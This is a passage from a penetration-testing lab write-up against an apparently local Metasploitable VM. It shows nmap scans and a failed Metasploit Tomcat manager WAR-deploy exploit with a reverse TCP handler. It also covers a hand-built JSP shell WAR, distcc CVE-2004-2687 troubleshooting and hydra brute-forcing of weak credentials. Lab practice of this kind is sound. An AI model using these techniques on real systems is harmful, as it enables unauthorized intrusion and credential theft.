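If run_command against the target also dies with a reset before a DONE token arrives, the fault is between you and distccd, not in the module. One thing to rule out is distccd's --allow list, which drops connections from source addresses it does not accept; the handler address in the failing run (192.168.74.1) is the host side of the VMware network, so the source seen by the target is worth confirming. nmap ships this same probe as the distcc-cve2004-2687 script, with the command passed through the distcc-cve2004-2687.cmd script argument, which is a quick second opinion.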
# Tomcat
Port 8180 was not identified; probe it:
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 8180
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:40 China Standard Time
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
The usual routine: brute-force the manager credentials, then deploy a WAR to get a shell. Let Metasploit do it:
msf6 exploit(multi/http/tomcat_mgr_deploy) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6117 bytes as g8EZVHSRE.war ...
[*] Executing /g8EZVHSRE/ZgXpG0r8NWYiewAWxe0R7H69CsMyfi.jsp...
[-] Execution failed on g8EZVHSRE [500 Internal Server Error]
[*] Undeploying g8EZVHSRE ...
[*] Exploit completed, but no session was created.
Metasploit could not finish the job. The upload itself succeeds, and the Tomcat manager shows the WAR deployed, but the JSP answers with a 500 when executed. The order of events in the output narrows it down: the 500 arrives when the JSP is requested, after upload and deployment, so whatever is wrong happens at JSP compilation or execution, not during upload. With root on the box already from the Samba shell, the fastest way to find out is to read Tomcat's own log for that request (on Ubuntu's tomcat5.5 package the logs live under /var/log/tomcat5.5/, an assumption to verify on the box). I still don't understand it; the same steps work for other people.
I also tried packing my own WAR with a JSP shell; no luck either.
D:\Desktop\1111>jar -cvf 222.war .\
added manifest
adding: 111.jsp(in = 855) (out= 494)(deflated 42%)
Odd.
# Weak passwords
Everything else comes down to weak credentials; run hydra against those services and that is that.
# Summary
The Tomcat WAR upload, the tikiwiki RCE and the distcc RCE all failed.
tikiwiki: probably the newer Metasploit reworked the encoders and the old modules are no longer compatible.
Tomcat: unknown.
distcc: the most common answer online blames SSL, but everyone who hit the problem tried that and it did not help.
If anyone knows, ping me.
References:
- https://stuffwithaurum.com/2015/06/13/metasploitable-walkthrough-an-exploitation-guide/